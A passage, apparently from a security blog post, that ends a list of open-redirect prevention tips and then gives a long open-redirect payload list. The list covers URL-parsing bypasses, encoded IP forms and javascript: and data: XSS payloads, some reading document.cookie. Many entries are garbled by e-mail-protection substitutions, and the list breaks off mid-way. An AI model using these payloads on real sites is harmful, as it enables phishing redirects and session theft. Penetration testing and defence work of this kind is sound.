the supplied value is valid, appropriate for the application, and is authorized for the user. \n * It is recommended that any such destination input be mapped to a value, rather than the actual URL or portion of the URL, and that server side code translate this value to the target URL. \n * Sanitize input by creating a list of trusted URLs (lists of hosts or a regex). When checking against the list, validate the parsed host of the URL rather than a substring or prefix of the raw string, since forms such as a leading `//`, an `@` user-info part or a backslash can make a URL appear to belong to a trusted host. \n * Force all redirects to first go through a page notifying users that they are going off of your site, and have them click a link to confirm. 
\n \n** Open Redirect [ Payload List ](<https://www.kitploit.com/search/label/Payload%20List> \"Payload List\" ) : ** \n\n \n \n /%09/example.com\n /%2f%2fexample.com\n /%2f%2f%2fbing.com%2f%3fwww.omise.co\n /%2f%5c%2f%67%6f%6f%67%6c%65%2e%63%6f%6d/\n /%5cexample.com\n /%68%74%74%70%3a%2f%2f%67%6f%6f%67%6c%65%2e%63%6f%6d\n /.example.com\n //%09/example.com\n //%5cexample.com\n ///%09/example.com\n ///%5cexample.com\n ////%09/example.com\n ////%5cexample.com\n /////example.com\n /////example.com/\n ////\\;@example.com\n ////example.com/\n ////example.com/%2e%2e\n ////example.com/%2e%2e%2f\n ////example.com/%2f%2e%2e\n ////example.com/%2f..\n ////example.com//\n ///\\;@example.com\n ///example.com\n ///example.com/\n //google.com/%2f..\n //[email\u00a0protected]/%2f..\n ///google.com/%2f..\n ///[email\u00a0protected]/%2f..\n ////google.com/%2f..\n ////[email\u00a0protected]/%2f..\n https://google.com/%2f..\n https://[email\u00a0protected]/%2f..\n /https://google.com/%2f..\n /https: //[email\u00a0protected]/%2f..\n //www.google.com/%2f%2e%2e\n //[email\u00a0protected]/%2f%2e%2e\n ///www.google.com/%2f%2e%2e\n ///[email\u00a0protected]/%2f%2e%2e\n ////www.google.com/%2f%2e%2e\n ////[email\u00a0protected]/%2f%2e%2e\n https://www.google.com/%2f%2e%2e\n https://[email\u00a0protected]/%2f%2e%2e\n /https://www.google.com/%2f%2e%2e\n /https://[email\u00a0protected]/%2f%2e%2e\n //google.com/\n //[email\u00a0protected]/\n ///google.com/\n ///[email\u00a0protected]/\n ////google.com/\n ////[email\u00a0protected]/\n https://google.com/\n https://[email\u00a0protected]/\n /https://google.com/\n /https://[email\u00a0protected]/\n //google.com//\n //[email\u00a0protected]//\n ///google.com//\n ///[email\u00a0protected]//\n //// google.com//\n ////[email\u00a0protected]//\n https://google.com//\n https://[email\u00a0protected]//\n //https://google.com//\n //https://[email\u00a0protected]//\n //www.google.com/%2e%2e%2f\n //[email\u00a0protected]/%2e%2e%2f\n 
///www.google.com/%2e%2e%2f\n ///[email\u00a0protected]/%2e%2e%2f\n ////www.google.com/%2e%2e%2f\n ////[email\u00a0protected]/%2e%2e%2f\n https://www.google.com/%2e%2e%2f\n https://[email\u00a0protected]/%2e%2e%2f\n //https://www.google.com/%2e%2e%2f\n //https://[email\u00a0protected]/%2e%2e%2f\n ///www.google.com/%2e%2e\n ///[email\u00a0protected]/%2e%2e\n ////www.google.com/%2e%2e\n ////[email\u00a0protected]/%2e%2e\n https:///www.google.com/%2e%2e\n https:///[email\u00a0protected]/%2e%2e\n //https:///www.google.com/%2e%2e\n //[email\u00a0protected]:///www.google.com/%2e%2e\n /https://www.google.com/%2e%2e\n /https://[email\u00a0protected]/%2e%2e\n ///www.google.com/%2f%2e%2e\n ///[email\u00a0protected]/%2f%2e%2e\n ////www.google.com/%2f%2e%2e\n ////[email\u00a0protected]/%2f%2e%2e\n https:///www.google.com/%2f%2e%2e\n https:///[email\u00a0protected]/%2f%2e%2e\n /https://www.google.com/%2f%2e%2e\n /https://[email\u00a0protected]/%2f%2e%2e\n /https:///www.google.com/%2f%2e%2e\n /https:///[email\u00a0protected]/%2f%2e%2e\n /%09/google.com\n /%09/[email\u00a0protected]com\n //%09/google.com\n //%09/[email\u00a0protected]\n ///%09/google.com\n ///%09/[email\u00a0protected]\n ////%09/google.com\n ////%09/[email\u00a0protected]\n https://%09/google.com\n https://%09/[email\u00a0protected] com\n /%5cgoogle.com\n /%[email\u00a0protected]\n //%5cgoogle.com\n //%[email\u00a0protected]\n ///%5cgoogle.com\n ///%[email\u00a0protected]\n ////%5cgoogle.com\n ////%[email\u00a0protected]\n https://%5cgoogle.com\n https://%[email\u00a0protected]\n /https://%5cgoogle.com\n /https://%[email\u00a0protected]\n https://google.com\n https://[email\u00a0protected]\n javascript:alert(1);\n javascript:alert(1)\n //javascript:alert(1);\n /javascript:alert(1);\n //javascript:alert(1)\n /javascript:alert(1)\n /%5cjavascript:alert(1);\n /%5cjavascript:alert(1)\n //%5cjavascript:alert(1);\n //%5cjavascript:alert(1)\n /%09/javascript:alert(1);\n /%09/javascript:alert(1)\n 
java%0d%0ascript%0d%0a:alert(0)\n //google.com\n https:google.com\n //google%E3%80%82com\n \\/\\/google.com/\n /\\/google.com/\n //google.com\n https ://www.whitelisteddomain.tld/https://www.google.com/\n \";alert(0);//\n javascript://www.whitelisteddomain.tld?%a0alert%281%29\n http://0xd8.0x3a.0xd6.0xce\n http://[email\u00a0protected]\n http://[email\u00a0protected]\n http://XY>.7d8T\\[email\u00a0protected]\n http://0xd83ad6ce\n http://[email\u00a0protected]\n http://[email\u00a0protected]\n http://XY>.7d8T\\[email\u00a0protected]\n http://3627734734\n http://[email\u00a0protected]\n http://[email\u00a0protected]\n http://XY>.7d8T\\[email\u00a0protected]\n http://472.314.470.462\n http://[email\u00a0protected]\n http://[email\u00a0protected]\n http://XY>.7d8T\\[email\u00a0protected]\n http://0330.072.0326.0316\n http://[email\u00a0protected]\n http://[email\u00a0protected]\n http://XY>.7d8T\\[email\u00a0protected]\n http://00330.00072.0000326.000 00316\n http://[email\u00a0protected]\n http://[email\u00a0protected]\n http://XY>.7d8T\\[email\u00a0protected]\n http://[::216.58.214.206]\n http://[email\u00a0protected][::216.58.214.206]\n http://[email\u00a0protected][::216.58.214.206]\n http://XY>.7d8T\\[email\u00a0protected][::216.58.214.206]\n http://[::ffff:216.58.214.206]\n http://[email\u00a0protected][::ffff:216.58.214.206]\n http://[email\u00a0protected][::ffff:216.58.214.206]\n http://XY>.7d8T\\[email\u00a0protected][::ffff:216.58.214.206]\n http://0xd8.072.54990\n http://[email\u00a0protected]\n http://[email\u00a0protected]\n http://XY>.7d8T\\[email\u00a0protected]\n http://0xd8.3856078\n http://[email\u00a0protected]\n http://[email\u00a0protected]\n http://XY>.7d8T\\[email\u00a0protected]\n http://00330.3856078\n http://[email\u00a0protected]\n http://[email\u00a0protected] 30.3856078\n http://XY>.7d8T\\[email\u00a0protected]\n http://00330.0x3a.54990\n http://[email\u00a0protected]\n http://[email\u00a0protected]\n 
http://XY>.7d8T\\[email\u00a0protected]\n http:0xd8.0x3a.0xd6.0xce\n http:[email\u00a0protected]\n http:[email\u00a0protected]\n http:XY>.7d8T\\[email\u00a0protected]\n http:0xd83ad6ce\n http:[email\u00a0protected]\n http:[email\u00a0protected]\n http:XY>.7d8T\\[email\u00a0protected]\n http:3627734734\n http:[email\u00a0protected]\n http:[email\u00a0protected]\n http:XY>.7d8T\\[email\u00a0protected]\n http:472.314.470.462\n http:[email\u00a0protected]\n http:[email\u00a0protected]\n http:XY>.7d8T\\[email\u00a0protected]\n http:0330.072.0326.0316\n http:[email\u00a0protected]\n http:[email\u00a0protected]\n http:XY>.7d8T\\20 [email\u00a0protected]\n http:00330.00072.0000326.00000316\n http:[email\u00a0protected]\n http:[email\u00a0protected]\n http:XY>.7d8T\\[email\u00a0protected]\n http:[::216.58.214.206]\n http:www.[email\u00a0protected][::216.58.214.206]\n http:[email\u00a0protected][::216.58.214.206]\n http:XY>.7d8T\\[email\u00a0protected][::216.58.214.206]\n http:[::ffff:216.58.214.206]\n http:[email\u00a0protected][::ffff:216.58.214.206]\n http:[email\u00a0protected][::ffff:216.58.214.206]\n http:XY>.7d8T\\[email\u00a0protected][::ffff:216.58.214.206]\n http:0xd8.072.54990\n http:[email\u00a0protected]\n http:[email\u00a0protected]\n http:XY>.7d8T\\[email\u00a0protected]\n http:0xd8.3856078\n http:[email\u00a0protected]\n http:[email\u00a0protected]\n http:XY>.7d8T\\[email\u00a0protected]\n http:00330.3856078\n http:[email\u00a0protected]\n http:3H6k7lI [email\u00a0protected]\n http:XY>.7d8T\\[email\u00a0protected]\n http:00330.0x3a.54990\n http:[email\u00a0protected]\n http:[email\u00a0protected]\n http:XY>.7d8T\\[email\u00a0protected]\n \u3031google.com\n \u3035google.com\n \u309dgoogle.com\n \u30fcgoogle.com\n \uff70google.com\n /\u3031google.com\n /\u3035google.com\n /\u309dgoogle.com\n /\u30fcgoogle.com\n /\uff70google.com\n %68%74%74%70%3a%2f%2f%67%6f%6f%67%6c%65%2e%63%6f%6d\n http://%67%6f%6f%67%6c%65%2e%63%6f%6d\n <>javascript:alert(1);\n 
<>//google.com\n //google.com\\@www.whitelisteddomain.tld\n https://:@google.com\\@www.whitelisteddomain.tld\n \\x6A\\x61\\x76\\x61\\x73\\x63\\x72\\x69\\x70\\x74\\x3aalert(1)\n \\u006A\\u0061\\u0076\\u0061\\u0073\\u0063\\u0072\\u0069\\u0070\\u0074\\u003aalert(1)\n ja\\nva\\tscript\\r:alert(1)\n \\j\\av\\a\\s\\cr\\i\\pt\\:\\a\\l\\ert\\(1\\)\n \\152\\141\\166\\141\\163\\143\\162\\151\\160\\164\\072alert(1)\n http://google.co m:80#@www.whitelisteddomain.tld/\n http://google.com:[email\u00a0protected]/\n ///example.com/%2e%2e\n ///example.com/%2e%2e%2f\n ///example.com/%2f%2e%2e\n ///example.com/%2f..\n ///example.com//\n //example.com\n //example.com/\n //example.com/%2e%2e\n //example.com/%2e%2e%2f\n //example.com/%2f%2e%2e\n //example.com/%2f..\n //example.com//\n //google.com\n //google%E3%80%82com\n //https:///example.com/%2e%2e\n //https://example.com/%2e%2e%2f\n //https://example.com//\n /<>//example.com\n /?url=//example.com&next=//example.com&redirect=//example.com&redir=//example.com&rurl=//example.com&redirect_uri=//example.com\n /?url=/\\/example.com&next=/\\/example.com&redirect=/\\/example.com&redirect_uri=/\\/example.com\n /?url=Https://example.com&next=Https://example.com&redirect=Https://example.com&redir=Https://example.com&rurl=Https://example.com&redirect_uri=Https://example.com< br/>/\\/\\/example.com/\n /\\/example.com/\n /example.com/%2f%2e%2e\n /http://%67%6f%6f%67%6c%65%2e%63%6f%6d\n /http://example.com\n /http:/example.com\n /https:/%5cexample.com/\n /https://%09/example.com\n /https://%5cexample.com\n /https:///example.com/%2e%2e\n /https:///example.com/%2f%2e%2e\n /https://example.com\n /https://example.com/\n /https://example.com/%2e%2e\n /https://example.com/%2e%2e%2f\n /https://example.com/%2f%2e%2e\n /https://example.com/%2f..\n /https://example.com//\n /https:example.com\n /redirect?url=//example.com&next=//example.com&redirect=//example.com&redir=//example.com&rurl=//example.com&redirect_uri=//example.com\n 
/redirect?url=/\\/example.com&next=/\\/example.com&redirect=/\\/example.com&redir=/\\/example.com&rurl=/\\/example.com&redirect_uri=/\\/example.com\n /redirect?url=Https://example.com&next=Https://example.com&redirect=Https://example.com&redir=Https://exampl e.com&rurl=Https://example.com&redirect_uri=Https://example.com\n \n //%2fxgoogle.com\n /ReceiveAutoRedirect/false?desiredLocationUrl=http://xssposed.org\n //localdomain.pw/%2f..\n //[email\u00a0protected]/%2f..\n ///localdomain.pw/%2f..\n ///[email\u00a0protected]/%2f..\n ////localdomain.pw/%2f..\n ////[email\u00a0protected]/%2f..\n https://localdomain.pw/%2f..\n https://[email\u00a0protected]/%2f..\n /https://localdomain.pw/%2f..\n /https://[email\u00a0protected]/%2f..\n //localdomain.pw/%2f%2e%2e\n //[email\u00a0protected]/%2f%2e%2e\n ///localdomain.pw/%2f%2e%2e\n ///[email\u00a0protected]/%2f%2e%2e\n ////localdomain.pw/%2f%2e%2e\n ////[email\u00a0protected]localdomain.pw/%2f%2e%2e\n https://localdomain.pw/%2f%2e%2e\n https://[email\u00a0protected]/%2f%2e%2e\n /https://localdomain.pw /%2f%2e%2e\n /https://[email\u00a0protected]/%2f%2e%2e\n //localdomain.pw/\n //[email\u00a0protected]/\n ///localdomain.pw/\n ///[email\u00a0protected]/\n ////localdomain.pw/\n ////[email\u00a0protected]/\n https://localdomain.pw/\n https://[email\u00a0protected]/\n /https://localdomain.pw/\n /https://[email\u00a0protected]/\n //localdomain.pw//\n //[email\u00a0protected]//\n ///localdomain.pw//\n ///[email\u00a0protected]//\n ////localdomain.pw//\n ////[email\u00a0protected]//\n https://localdomain.pw//\n https://[email\u00a0protected]//\n //https://localdomain.pw//\n //https://[email\u00a0protected]//\n //localdomain.pw/%2e%2e%2f\n //[email\u00a0protected]/%2e%2e%2f\n ///localdomain.pw/%2e%2e%2f\n ///www.whitelisteddoma [email\u00a0protected]/%2e%2e%2f\n ////localdomain.pw/%2e%2e%2f\n ////[email\u00a0protected]/%2e%2e%2f\n https://localdomain.pw/%2e%2e%2f\n https://[email\u00a0protected]/%2e%2e%2f\n 
//https://localdomain.pw/%2e%2e%2f\n //https://[email\u00a0protected]/%2e%2e%2f\n ///localdomain.pw/%2e%2e\n ///[email\u00a0protected]/%2e%2e\n ////localdomain.pw/%2e%2e\n ////[email\u00a0protected]/%2e%2e\n https:///localdomain.pw/%2e%2e\n https:///[email\u00a0protected]/%2e%2e\n //https:///localdomain.pw/%2e%2e\n //[email\u00a0protected]:///localdomain.pw/%2e%2e\n /https://localdomain.pw/%2e%2e\n /https://[email\u00a0protected]/%2e%2e\n ///localdomain.pw/%2f%2e%2e\n ///[email\u00a0protected]/%2f%2e%2e\n ////localdomain.pw/%2f%2e%2e\n ////[email\u00a0protected]/%2f%2e%2e\n https:///localdomain. pw/%2f%2e%2e\n https:///[email\u00a0protected]/%2f%2e%2e\n /https://localdomain.pw/%2f%2e%2e\n /https://[email\u00a0protected]/%2f%2e%2e\n /https:///localdomain.pw/%2f%2e%2e\n /https:///[email\u00a0protected]/%2f%2e%2e\n /%09/localdomain.pw\n /%09/[email\u00a0protected]\n //%09/localdomain.pw\n //%09/[email\u00a0protected]\n ///%09/localdomain.pw\n ///%09/[email\u00a0protected]\n ////%09/localdomain.pw\n ////%09/[email\u00a0protected]\n https://%09/localdomain.pw\n https://%09/[email\u00a0protected]\n /%5clocaldomain.pw\n /%[email\u00a0protected]\n //%5clocaldomain.pw\n //%[email\u00a0protected]\n ///%5clocaldomain.pw\n ///%[email\u00a0protected]\n ////%5clocaldomain.pw\n ////%[email\u00a0protected]\n https://%5cloc aldomain.pw\n https://%[email\u00a0protected]\n /https://%5clocaldomain.pw\n /https://%[email\u00a0protected]\n https://localdomain.pw\n https://[email\u00a0protected]\n javascript:alert(1);\n javascript:alert(1)\n //javascript:alert(1);\n /javascript:alert(1);\n //javascript:alert(1)\n /javascript:alert(1)\n /%5cjavascript:alert(1);\n /%5cjavascript:alert(1)\n //%5cjavascript:alert(1);\n //%5cjavascript:alert(1)\n /%09/javascript:alert(1);\n /%09/javascript:alert(1)\n java%0d%0ascript%0d%0a:alert(0)\n //localdomain.pw\n https:localdomain.pw\n //localdomain%E3%80%82pw\n \\/\\/localdomain.pw/\n /\\/localdomain.pw/\n /%2f%5c%2f%67%6f%6f%67%6c%65%2e%63%6f%6d/\n 
//localdomain.pw\n https://www.whitelisteddomain.tld/https://localdomain.pw/\n \";alert(0);//\n javascript://www.whitelisteddomain.tld?%a0alert%281%29\n http://0xd8.0x3a.0xd6.0xce\n http://www.whitelisteddomain.tl [email\u00a0protected]\n http://[email\u00a0protected]\n http://XY>.7d8T\\[email\u00a0protected]\n http://0xd83ad6ce\n http://[email\u00a0protected]\n http://[email\u00a0protected]\n http://XY>.7d8T\\[email\u00a0protected]\n http://3627734734\n http://[email\u00a0protected]\n http://[email\u00a0protected]\n http://XY>.7d8T\\[email\u00a0protected]\n http://472.314.470.462\n http://[email\u00a0protected]\n http://[email\u00a0protected]\n http://XY>.7d8T\\[email\u00a0protected]\n http://0330.072.0326.0316\n http://[email\u00a0protected]\n http://[email\u00a0protected]\n http://XY>.7d8T\\[email\u00a0protected]\n http://00330.00072.0000326.00000316\n http://[email\u00a0protected]\n http://[email\u00a0protected]\n http://XY>.7d8T\\[email\u00a0protected]\n http: //[::216.58.214.206]\n http://[email\u00a0protected][::216.58.214.206]\n http://[email\u00a0protected][::216.58.214.206]\n http://XY>.7d8T\\[email\u00a0protected][::216.58.214.206]\n http://[::ffff:216.58.214.206]\n http://[email\u00a0protected][::ffff:216.58.214.206]\n http://[email\u00a0protected][::ffff:216.58.214.206]\n http://XY>.7d8T\\[email\u00a0protected][::ffff:216.58.214.206]\n http://0xd8.072.54990\n http://[email\u00a0protected]\n http://[email\u00a0protected]\n http://XY>.7d8T\\[email\u00a0protected]\n http://0xd8.3856078\n http://[email\u00a0protected]\n http://[email\u00a0protected]\n http://XY>.7d8T\\[email\u00a0protected]\n http://00330.3856078\n http://[email\u00a0protected]\n http://[email\u00a0protected]\n http://XY>.7d8T\\[email\u00a0protected]\n http://00330.0x3a.54990\n http://[email\u00a0protected]\n http://[email\u00a0protected]\n http://XY&g t;.7d8T\\[email\u00a0protected]\n http:0xd8.0x3a.0xd6.0xce\n http:[email\u00a0protected]\n http:[email\u00a0protected]\n 
http:XY>.7d8T\\[email\u00a0protected]\n http:0xd83ad6ce\n http:[email\u00a0protected]\n http:[email\u00a0protected]\n http:XY>.7d8T\\[email\u00a0protected]\n http:3627734734\n http:[email\u00a0protected]\n http:[email\u00a0protected]\n http:XY>.7d8T\\[email\u00a0protected]\n http:472.314.470.462\n http:[email\u00a0protected]\n http:[email\u00a0protected]\n http:XY>.7d8T\\[email\u00a0protected]\n http:0330.072.0326.0316\n http:[email\u00a0protected]\n http:[email\u00a0protected]\n http:XY>.7d8T\\[email\u00a0protected]\n http:00330.00072.0000326.00000316\n http:[email\u00a0protected]\n http:[email\u00a0protected]\n http:XY>. 7d8T\\[email\u00a0protected]\n http:[::216.58.214.206]\n http:[email\u00a0protected][::216.58.214.206]\n http:[email\u00a0protected][::216.58.214.206]\n http:XY>.7d8T\\[email\u00a0protected][::216.58.214.206]\n http:[::ffff:216.58.214.206]\n http:[email\u00a0protected][::ffff:216.58.214.206]\n http:[email\u00a0protected][::ffff:216.58.214.206]\n http:XY>.7d8T\\[email\u00a0protected][::ffff:216.58.214.206]\n http:0xd8.072.54990\n http:[email\u00a0protected]\n http:[email\u00a0protected]\n http:XY>.7d8T\\[email\u00a0protected]\n http:0xd8.3856078\n http:[email\u00a0protected]\n http:[email\u00a0protected]\n http:XY>.7d8T\\[email\u00a0protected]\n http:00330.3856078\n http:[email\u00a0protected]\n http:[email\u00a0protected]\n http:XY>.7d8T\\[email\u00a0protected]\n http:00330.0x3a.54990\n http:[email\u00a0protected]\n http:[email\u00a0protected]\n http:XY >.7d8T\\[email\u00a0protected]\n \u3031localdomain.pw\n \u3035localdomain.pw\n \u309dlocaldomain.pw\n \u30fclocaldomain.pw\n \uff70localdomain.pw\n /\u3031localdomain.pw\n /\u3035localdomain.pw\n /\u309dlocaldomain.pw\n /\u30fclocaldomain.pw\n /\uff70localdomain.pw\n %68%74%74%70%3a%2f%2f%67%6f%6f%67%6c%65%2e%63%6f%6d\n http://%67%6f%6f%67%6c%65%2e%63%6f%6d\n <>javascript:alert(1);\n <>//localdomain.pw\n //localdomain.pw\\@www.whitelisteddomain.tld\n 
https://:@localdomain.pw\\@www.whitelisteddomain.tld\n \\x6A\\x61\\x76\\x61\\x73\\x63\\x72\\x69\\x70\\x74\\x3aalert(1)\n \\u006A\\u0061\\u0076\\u0061\\u0073\\u0063\\u0072\\u0069\\u0070\\u0074\\u003aalert(1)\n ja\\nva\\tscript\\r:alert(1)\n \\j\\av\\a\\s\\cr\\i\\pt\\:\\a\\l\\ert\\(1\\)\n \\152\\141\\166\\141\\163\\143\\162\\151\\160\\164\\072alert(1)\n http://localdomain.pw:80#@www.whitelisteddomain.tld/\n http://localdomain.pw:[email\u00a0protected]/\n http://3H6k7lIAiqjf[email\u00a0protected] [email\u00a0protected]/\n http://XY>.7d8T\\[email\u00a0protected][email\u00a0protected]/\n http://[email\u00a0protected]@localdomain.pw/\n http://XY>.7d8T\\[email\u00a0protected]@localdomain.pw/\n http://www.whitelisteddomain.tld+&@localdomain.pw#[email\u00a0protected]/\n http://localdomain.pw\\twww.whitelisteddomain.tld/\n //localdomain.pw:80#@www.whitelisteddomain.tld/\n //localdomain.pw:[email\u00a0protected]/\n //[email\u00a0protected][email\u00a0protected]/\n //XY>.7d8T\\[email\u00a0protected][email\u00a0protected]/\n //[email\u00a0protected]@localdomain.pw/\n //XY>.7d8T\\[email\u00a0protected]@localdomain.pw/\n //www.whitelisteddomain.tld+&@localdomain.pw#[email\u00a0protected]/\n //localdomain.pw\\twww.whitelisteddomain.tld/\n //;@localdomain.pw\n http://;@localdomain.pw\n @localdomain.pw\n javascript://https://www.whitelisteddomain.tld/? 
z=%0Aalert(1)\n data:text/html;base64,PHNjcmlwdD5hbGVydCgiWFNTIik8L3NjcmlwdD4=\n http://localdomain.pw%2f%2f.www.whitelisteddomain.tld/\n http://localdomain.pw%5c%5c.www.whitelisteddomain.tld/\n http://localdomain.pw%3F.www.whitelisteddomain.tld/\n http://localdomain.pw%23.www.whitelisteddomain.tld/\n http://www.whitelisteddomain.tld:80%40localdomain.pw/\n http://www.whitelisteddomain.tld%2elocaldomain.pw/\n /x:1/:///%01javascript:alert(document.cookie)/\n /https:/%5clocaldomain.pw/\n javascripT://anything%0D%0A%0D%0Awindow.alert(document.cookie)\n /http://localdomain.pw\n /%2f%2flocaldomain.pw\n /localdomain.pw/%2f%2e%2e\n /http:/localdomain.pw\n /.localdomain.pw\n http://.localdomain.pw\n .localdomain.pw\n ///\\;@localdomain.pw\n ///localdomain.pw\n /////localdomain.pw/\n /////localdomain.pw\n java%0ascript:alert(1)\n java%09script:alert(1)\n java%0dscript:alert(1)\n javascript://%0aalert(1)\n Javas%26%2399;ript:alert(1)\n data: www.whitelisteddomain.tld;text/html;charset=UTF-8,<html><script>document.write(document.domain);</script><iframe/src=xxxxx>aaaa</iframe></html>\n jaVAscript://www.whitelisteddomain.tld//%0d%0aalert(1);//\n http://www.localdomain.pw\\.www.whitelisteddomain.tld\n %19Jav%09asc%09ript:https%20://www.whitelisteddomain.tld/%250Aconfirm%25281%2529\n //[email\u00a0protected]/%2f..\n ///google.com/%2f..\n ///[email\u00a0protected]/%2f..\n ////google.com/%2f..\n ////[email\u00a0protected]/%2f..\n https://google.com/%2f..\n https://[email\u00a0protected]/%2f..\n /https://google.com/%2f..\n /https://[email\u00a0protected]/%2f..\n //google.com/%2f%2e%2e\n //[email\u00a0protected]/%2f%2e%2e\n ///google.com/%2f%2e%2e\n ///[email\u00a0protected]/%2f%2e%2e\n ////google.com/%2f%2e%2e\n ////[email\u00a0protected]/%2f%2e%2e\n https://google.com/%2f%2e%2e\n https://[email\u00a0protected]/%2f%2e%2e\n /https://google.com/%2f%2e%2 e\n /https://[email\u00a0protected]/%2f%2e%2e\n //google.com/\n //[email\u00a0protected]/\n ///google.com/\n 
///[email\u00a0protected]/\n ////google.com/\n ////[email\u00a0protected]/\n https://google.com/\n https://[email\u00a0protected]/\n /https://google.com/\n /https://[email\u00a0protected]/\n //google.com//\n //[email\u00a0protected]//\n ///google.com//\n ///[email\u00a0protected]//\n ////google.com//\n ////[email\u00a0protected]//\n https://google.com//\n https://[email\u00a0protected]//\n //https://google.com//\n //https://[email\u00a0protected]//\n //google.com/%2e%2e%2f\n //[email\u00a0protected]/%2e%2e%2f\n ///google.com/%2e%2e%2f\n ///[email\u00a0protected]/%2e%2e%2f\n ////google.com/%2e%2e%2f\n ////[email\u00a0protected]/%2e%2e%2f\n https://google.com/%2e%2e%2f\n https://[email\u00a0protected]/%2e%2e%2f\n //https://google.com/%2e%2e%2f\n //https://[email\u00a0protected]/%2e%2e%2f\n ///google.com/%2e%2e\n ///[email\u00a0protected]/%2e%2e\n ////google.com/%2e%2e\n ////[email\u00a0protected]/%2e%2e\n https:///google.com/%2e%2e\n https:///[email\u00a0protected]/%2e%2e\n //https:///google.com/%2e%2e\n //[email\u00a0protected]:///google.com/%2e%2e\n /https://google.com/%2e%2e\n /https://[email\u00a0protected]/%2e%2e\n ///google.com/%2f%2e%2e\n ///[email\u00a0protected]/%2f%2e%2e\n ////google.com/%2f%2e%2e\n ////[email\u00a0protected]/%2f%2e%2e\n https:///google.com/%2f%2e%2e\n https:///exampl[email\u00a0protected]/%2f%2e%2e\n /https://google.com/%2f%2e%2e\n /https://[email\u00a0protected]/%2f%2e%2e\n /https:///google.com/%2f%2e%2e\n /https:///[email\u00a0protected]/%2f%2e%2e\n /%09/google.com\n /%09/[email\u00a0protected]\n //%09/google.com\n //%09/[email\u00a0protected]\n ///%09/google.com\n ///%09/[email\u00a0protected]\n ////%09/google.com\n ////%09/[email\u00a0protected]\n https://%09/google.com\n https://%09/[email\u00a0protected]\n /%5c google.com\n /%[email\u00a0protected]\n //%5cgoogle.com\n //%[email\u00a0protected]\n ///%5cgoogle.com\n ///%[email\u00a0protected]\n ////%5cgoogle.com\n ////%[email\u00a0protected]\n https://%5cgoogle.com\n 
https://%[email\u00a0protected]\n /https://%5cgoogle.com\n /https://%[email\u00a0protected]\n https://google.com\n https://[email\u00a0protected]\n javascript:alert(1);\n javascript:alert(1)\n //javascript:alert(1);\n /javascript:alert(1);\n //javascript:alert(1)\n /javascript:alert(1)\n /%5cjavascript:alert(1);\n /%5cjavascript:alert(1)\n //%5cjavascript:alert(1);\n //%5cjavascript:alert(1)\n /%09/javascript:alert(1);\n /%09/javascript:alert(1)\n java%0d%0ascript%0d%0a:alert(0)\n //google.com\n https:google.com\n //google%E3%80%82com\n \\/\\/google.com/\n /\\/google.com/\n //google.com\n https://example.com/https://google.com/\n \";alert(0);//\n javascript://example.com?%a0alert%281%29\n http://0 xd8.0x3a.0xd6.0xce\n http://[email\u00a0protected]\n http://[email\u00a0protected]\n http://XY>.7d8T\\[email\u00a0protected]\n http://0xd83ad6ce\n http://[email\u00a0protected]\n http://[email\u00a0protected]\n http://XY>.7d8T\\[email\u00a0protected]\n http://3627734734\n http://[email\u00a0protected]\n http://[email\u00a0protected]\n http://XY>.7d8T\\[email\u00a0protected]\n http://472.314.470.462\n http://[email\u00a0protected]\n http://[email\u00a0protected]\n http://XY>.7d8T\\[email\u00a0protected]\n http://0330.072.0326.0316\n http://[email\u00a0protected]\n http://[email\u00a0protected]\n http://XY>.7d8T\\[email\u00a0protected]\n http://00330.00072.0000326.00000316\n http://[email\u00a0protected]\n http://[email\u00a0protected]\n http://XY>.7d8T\\[email\u00a0protected]\n http://[::216.58.214.206]\n http: //[email\u00a0protected][::216.58.214.206]\n http://[email\u00a0protected][::216.58.214.206]\n http://XY>.7d8T\\[email\u00a0protected][::216.58.214.206]\n http://[::ffff:216.58.214.206]\n http://[email\u00a0protected][::ffff:216.58.214.206]\n http://[email\u00a0protected][::ffff:216.58.214.206]\n http://XY>.7d8T\\[email\u00a0protected][::ffff:216.58.214.206]\n http://0xd8.072.54990\n http://[email\u00a0protected]\n http://[email\u00a0protected]\n 
http://XY>.7d8T\\[email\u00a0protected]\n http://0xd8.3856078\n http://[email\u00a0protected]\n http://[email\u00a0protected]\n http://XY>.7d8T\\[email\u00a0protected]\n http://00330.3856078\n http://[email\u00a0protected]\n http://[email\u00a0protected]\n http://XY>.7d8T\\[email\u00a0protected]\n http://00330.0x3a.54990\n http://[email\u00a0protected]\n http://[email\u00a0protected]\n http://XY>.7d8T\\[email\u00a0protected]\n http:0xd8.0x3a.0xd6.0xce\n http:[email\u00a0protected]\n http:3H6 [email\u00a0protected]\n http:XY>.7d8T\\[email\u00a0protected]\n http:0xd83ad6ce\n http:[email\u00a0protected]\n http:[email\u00a0protected]\n http:XY>.7d8T\\[email\u00a0protected]\n http:3627734734\n http:[email\u00a0protected]\n http:[email\u00a0protected]\n http:XY>.7d8T\\[email\u00a0protected]\n http:472.314.470.462\n http:[email\u00a0protected]\n http:[email\u00a0protected]\n http:XY>.7d8T\\[email\u00a0protected]\n http:0330.072.0326.0316\n http:[email\u00a0protected]\n http:[email\u00a0protected]\n http:XY>.7d8T\\[email\u00a0protected]\n http:00330.00072.0000326.00000316\n http:[email\u00a0protected]\n http:[email\u00a0protected]\n http:XY>.7d8T\\[email\u00a0protected]\n http:[::216.58.214.206]\n http:[email\u00a0protected][::216.58.214.206]\n http:[email\u00a0protected][::216.58.214.206]\n http:XY>.7d8T\\[email\u00a0protected][::216.58.214.206 ]\n http:[::ffff:216.58.214.206]\n http:[email\u00a0protected][::ffff:216.58.214.206]\n http:[email\u00a0protected][::ffff:216.58.214.206]\n http:XY>.7d8T\\[email\u00a0protected][::ffff:216.58.214.206]\n http:0xd8.072.54990\n http:[email\u00a0protected]\n http:[email\u00a0protected]\n http:XY>.7d8T\\[email\u00a0protected]\n http:0xd8.3856078\n http:[email\u00a0protected]\n http:[email\u00a0protected]\n http:XY>.7d8T\\[email\u00a0protected]\n http:00330.3856078\n http:[email\u00a0protected]\n http:[email\u00a0protected]\n http:XY>.7d8T\\[email\u00a0protected]\n http:00330.0x3a.54990\n http:[email\u00a0protected]\n 
